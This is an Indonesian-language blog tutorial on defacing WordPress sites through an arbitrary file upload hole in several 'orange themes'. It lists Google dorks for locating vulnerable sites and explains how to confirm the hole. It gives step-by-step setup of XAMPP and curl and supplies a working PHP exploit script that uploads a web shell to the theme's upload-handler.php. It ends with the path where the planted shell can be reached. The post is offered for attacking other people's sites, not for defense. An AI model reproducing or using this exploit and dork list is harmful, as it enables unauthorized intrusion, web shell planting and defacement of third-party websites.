Deface Menggunakan Exploit orange themes File Upload


Assalamualaikum , kali ini saya akan share Cara Deface Menggunakan Exploit orange themes File Upload

Oke , tanpa basa-basi , langsung saja .

Pertama , Karena Judulnya orange themes File Upload , Maka ada beberapa Themes yang Sama Vuln dengan itu ,


  • inurl:"/wp-content/themes/bordeaux-theme/"
  • inurl:"/wp-content/themes/bulteno-theme/"
  • inurl:"/wp-content/themes/oxygen-theme/"
  • inurl:"/wp-content/themes/radial-theme/"
  • inurl:"/wp-content/themes/rayoflight-theme/"
  • inurl:"/wp-content/themes/reganto-theme/"
  • inurl:"/wp-content/themes/rockstar-theme/"  

 Sekarang , Gunakan 1 Dork Di atas .

Saya akan mengambil 1 Dork . 

Yaitu : inurl:"/wp-content/themes/bordeaux-theme/"

Lalu , Jika Sudah dapat kan target , 

ex: www.site.com/wp-content/themes/bordeux-theme/

Anda tambahkan Vuln nya , /functions/upload-handler.php

Maka targetnya akan menjadi 

www.site.com/wp-content/themes/bordeux-theme/functions/upload-handler.php

Jika Keluar Error maka Site Itu Vuln :D


nah Sebelum mengeksekusikan Target ini , yang anda butuh kan adalah :

  1. Xammp , Anda bisa download XAMMP di google, saya rasa sudah banyak bertebaran , lalu Install .
  2. Jika Sudah , Buka Folder Xammp > terus buka lagi Folder PHP , Dan cari code PHP.INI , Tekan Control + F / CTRL + F , Ketikkan curl Lalu enter , jika ketemu Delete (;) Tanpa tanda kurung () , Lalu Jika tidak menemukan tanda ; ini berarti kamu sudah succes ..
  3. Letakkan Shell Anda di Folder Xammp - Folder PHP , contoh Shell ex : up.php
Jika 3 cara diatas sudah selesai sekarang kita akan Mengeksekusikan Target ..

Copykan Exploit ini 
<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


Dan Save dengan extention .php , Disini saya akan save dengan File bernama x.php , Simpan di dekat Folder Xammp - Folder PHP ..
Tepat dimana anda letak Shell anda tadi ..

Ingat , nama shell saya ada up.php 
Maka di bagian exploit tadi 


$uploadfile="upload.php"; <-- upload.php rename menjadi up.php 

Jika sudah Save Kembali :))

Sekarang .

Buka Xammp Anda , Disini Jika xammp anda termasuk Versi lama , maka anda harus masuk ke folder xammp nya langsung 

Cara nya 

ketik : cd\ Lalu tekan Enter 
Lalu Jika CMD anda kembali ke System C atau seperti ini
C:\Documents and Settings\Alliance>cd\

C:\>
Maka sudah berhasil , Sekarang selanjutnya tekan cd /xammp/php tekan Enter
Jika Sudah Jlankan Exploitnya , tadi nama Exploit saya adalah x.php maka cara menjalankannya seperti ini ..
cd:\xammp\php\>: php x.php Dan tekan Enter ..
Jika Keluar tulisan nama shell anda di CMD atau Command Promd tadi maka SUCCES xD
Shell acces , www.site.com/wp-content/uploads/2013/11/up.php
Jika masih bingung , Kamu bisa Commentar di blog ini .
:) 
 
 
Sumber : dumaicodes
Tags : Cara untuk Meretas sebuah Komputer,trick Hack Komputer Super Jail,Cara Mematikan Komputer Orang Lain,Cara Mengendalikan Komputer Jarak Jauh,Cara Meretas Komputer Orang Lain,Cara Hack Komputer Orang Lain,Cara Meretas Komputer Orang dari Jarak Jauh,Cara memantau Komputer lain dengan Command Prompt,Cara hack komputer remote menggunakan IP,Trik Hack Komputer yang Sangat Berbahaya,Dasar-dasar Meretas,Dasar-dasar Hack,
Share this article please, on :
Share on fb Tweet Share on G+

0 Response to "Deface Menggunakan Exploit orange themes File Upload"

Post a Comment

Powered by Blogger.